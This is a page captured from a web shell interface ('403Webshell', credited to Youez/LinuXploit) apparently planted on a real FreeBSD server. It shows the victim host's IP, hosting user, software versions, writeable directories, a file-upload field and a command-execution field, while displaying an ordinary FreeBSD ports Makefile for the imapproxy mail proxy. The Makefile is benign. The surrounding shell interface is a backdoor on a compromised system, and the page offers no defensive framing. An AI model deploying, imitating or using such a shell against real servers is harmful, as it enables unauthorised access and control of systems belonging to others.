403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/up-imapproxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/up-imapproxy/Makefile
PORTNAME=	imapproxy
DISTVERSION=	1.2.8-pre20171105
CATEGORIES=	mail
PKGNAMEPREFIX=	up-

MAINTAINER=	brnrd@FreeBSD.org
COMMENT=	Caching IMAP proxy server
WWW=		http://www.imapproxy.org

LICENSE=	GPLv2+
LICENSE_FILE=	${WRKSRC}/COPYING

USES=		autoreconf tar:bzip2 ncurses pathfix ssl

USE_GITHUB=	yes
GH_ACCOUNT=	rlaager
GH_PROJECT=	${PORTNAME}-pkg
GH_TAGNAME=	upstream/1.2.8_svn20171105

OPTIONS_DEFINE=	DOVECOT DOCS

DOVECOT_DESC=	Use with dovecot2
DOVECOT_RUN_DEPENDS=	dovecot:mail/dovecot

GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--with-openssl=${OPENSSLBASE}

USE_RC_SUBR=	imapproxyd

SUB_FILES=	pkg-message

DOCS=		ChangeLog README README.debian README.known_issues README.ssl
SBIN=		in.imapproxyd pimpstat

post-patch:
	${MKDIR} ${WRKSRC}/bin

do-install:
.for i in ${SBIN}
	(cd ${WRKSRC}/bin && ${INSTALL_PROGRAM} ${i} ${STAGEDIR}${PREFIX}/sbin)
.endfor
	(cd ${WRKSRC}/scripts && ${INSTALL_DATA} imapproxy.conf \
		${STAGEDIR}${PREFIX}/etc/imapproxyd.conf.sample)

do-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
.for i in ${DOCS}
	(cd ${WRKSRC} && ${INSTALL_DATA} ${i} ${STAGEDIR}${DOCSDIR})
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit